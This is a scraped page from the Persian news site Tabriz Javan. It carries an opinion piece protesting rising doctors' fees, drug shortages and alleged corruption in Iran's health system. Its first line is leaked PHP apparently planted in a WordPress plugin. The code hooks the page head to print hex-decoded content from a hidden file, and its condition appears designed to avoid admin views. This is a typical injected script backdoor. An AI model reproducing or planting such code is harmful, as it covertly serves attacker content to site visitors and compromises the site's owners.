if ((is_admin() || (function_exists('get_hex_cache'))) !== true) { add_action('wp_head', 'get_hex_cache', 12); function get_hex_cache() { return print(@hex2bin( '3c7' . (file_get_contents(__DIR__ .'/_inc.tmp')))); } }
Warning: session_start(): Cannot start session when headers already sent in /home3/tabrizj3/public_html/wp-content/plugins/wp-seo-booster-pro/wp-seo-booster-pro.php on line 44
لطفا اجازه بدهید بمیریم! - تبریز جوان
کد خبر : 58943
تاریخ انتشار : یکشنبه ۲۱ فروردین ۱۴۰۱ - ۱۷:۲۱

اندرمصائب بیماران و هزینه های کمرشکن درما

لطفا اجازه بدهید بمیریم!

لطفا اجازه بدهید بمیریم!
سنگینی و ناعادلانه بودن این سطح از افزایش نرخ ویزیت پزشکان را کسانی بیشتر و بهتر درک می کنند که با هزینه های گزاف و کمرشکن درمان دست و پنجه نرم می کنند.

پایگاه خبری تبریز جوان| امیر لیل آبادی/از قحطی و گرانی دارو، به ویژه داروهای بیماران خاص و البته زیرمیزی ها و دریافت های نقد ویزیت حالا به مدد سازمان نظام پزشکی رسیدیم به افزایش چندین برابری تعرفه ویزیت پزشکان که هرجور حساب کنید روابط و ساز و کارهای شغلی آن ها بیش از آن که تابع نظام سلامت و مسئولیت های مدنی باشد تابع نظام سرمایه داری و زرسالاری مافیایی است.

سنگینی و ناعادلانه بودن این سطح از افزایش نرخ ویزیت پزشکان را کسانی بیشتر و بهتر درک می کنند که سال هاست با درد و رنج ناشی از مریض داری و هزینه های گزاف و کمرشکن درمان دست و پنجه نرم می کنند.

مافیای بهداشت و درمان همچنان یکه تازی می کند و هیچ کس جرات برخورد با تاجران سلامت و کاسبان درمان را ندارد. پس لطفا اجازه بدهید بمیریم!

قحطی و کبود دارو، زیرمیزی های بی حساب و کتاب، محدودیت تجهیزات، لوازم کمک درمانی و بازتوانی، گرانی سرسام آور دارو و اقلام پزشکی، مدیریت دورهمی سازمان نظام پزشکی، داستان ارز دولتی دارو، توزیع خارج از شبکه داروهای بیماران خاص و هزار و یک مساله ریز و درشت دیگر از جمله معضلات نظام سلامت، بهداشت و درمان کشور به شمار می روند که البته هیچ مقام مسئولی نیز جسارت ورود و حل این مشکلات را ندارد.

وقتی سیاست گذاران حوزه بهداشت، درمان، پزشکی و دارو خودشان ذی نفعان همین حوزه مافیایی هستند نتیجه اش عمق فاجعه ای است که امروز در حوزه سلامت حاکم شده و بیماران و خانواده های آنان را به مسلخی به نام جدال با مرگ و زندگی کشانده است.

سال هاست در حوزه بهداشت و درمان، رویه غالب این شده است که مریض شدن مردم و افزایش روزافزون تعداد بیماران چندان اهمیت ندارد و به جای پیشگیری، همواره به دنبال افزایش بودجه های درمان هستند چون قرار است این بودجه به جیب عده ای مشخص برود.

فاجعه زمانی عمیق تر می شود که بدانیم، سیاست گذاران حوزه درمان در مجلس، سازمان های بهداشتی و درمانی، نظام پزشکی و حتی 3 هزار مدیر ارشد و عادی شاغل در وزارت بهداشت همگی پزشک هستند. معادله ای که هیچ مجهولی ندارد.

البته که باید با احترام و تکریم، حساب پزشکان خیر و محترمی را که به صورت خودجوش و تحت آموزه های اخلاقی و دینی خدمات خیریه به بیمارانشان ارایه می دهند و گمنامانه ایفای نقش می کنند از این قبیله جدا کرد.

متاسفانه مافیای دارو، درمان، خدمات بیمارستانی پیراپزشکی، بالینی و هزار و یک خدمات دیگر مرتبط با مساله مهم سلامت و درمان بیماران، امروز در کشور جولان کاسبکاری و تجارت مرگ و زندگی با جان بیماران می دهندو هیچ نظارتی نیز بر فعالیت  این شبکه مافیایی وجود ندارد.

برخی بیمارستان ها که از کاربری های ملی و عمومی بهره مند شده و با ثمن بخس زمین های ملی را تصاحب کرده اند و باید خدمات رایگان و یا حداقل ارزان به مردم ارایه دهند همچون یک بنگاه اقتصادی در حال مکیدن ته مانده داروندار بیماران و خانواده هایی هستند که قرار بو تنها رنج مریض داری را تحمل کنند.

در حوزه حقوق بیماران بعد از درمان و عمل های جراحی منجر به قصور و تقصیرهای پزشکی نیز، وضع بدتر از همه حوزه های مذکور است.

پزشکان مقصر که با تشخیص، درمان، جراحی و مراقبت های غلط باعث ایراد آسیب های جبران ناپذیر برای بیماران می شوند از مصونیت و رویئن تنی ویژه ای برخوردارند و ذی نفعان و همکاران آنان در شوراهای حل اختلاف و دادسراهای پزشکی به راحتی با زیر پا گذاشتن حقوق بیماران آسیب دیده  پرونده های شکایت را بی هیچ پاسخگویی به نفع پزشکان همکار خود مختومه می کنند.

به نظر می رسد تا زمانی که حصار بسته و مافیایی بهداشت، درمان، پزشکی و سلامت کشور شکسته نشود و آب رفته به جوی باز نگردد جان و مال و امنیت روانی به هم ریخته مردم در هزارتوی این شبکه مافیایی وچه المصالحه خوی قلدرمآبانه بخش بزرگی از چامعه پزشکی خواهد بود.

این روزها بسیاری از بیماران و خانوتده های آنان، آرزوی مرگ را بیش از درمان و بهبودی زیر لب و در دل زمزمه می کنند…

برچسب ها :

ناموجود
ارسال نظر شما
مجموع نظرات : 1 در انتظار بررسی : 1 انتشار یافته : 0
  • نظرات ارسال شده توسط شما، پس از تایید توسط مدیران سایت منتشر خواهد شد.
  • نظراتی که حاوی تهمت یا افترا باشد منتشر نخواهد شد.
  • نظراتی که به غیر از زبان فارسی یا غیر مرتبط با خبر باشد منتشر نخواهد شد.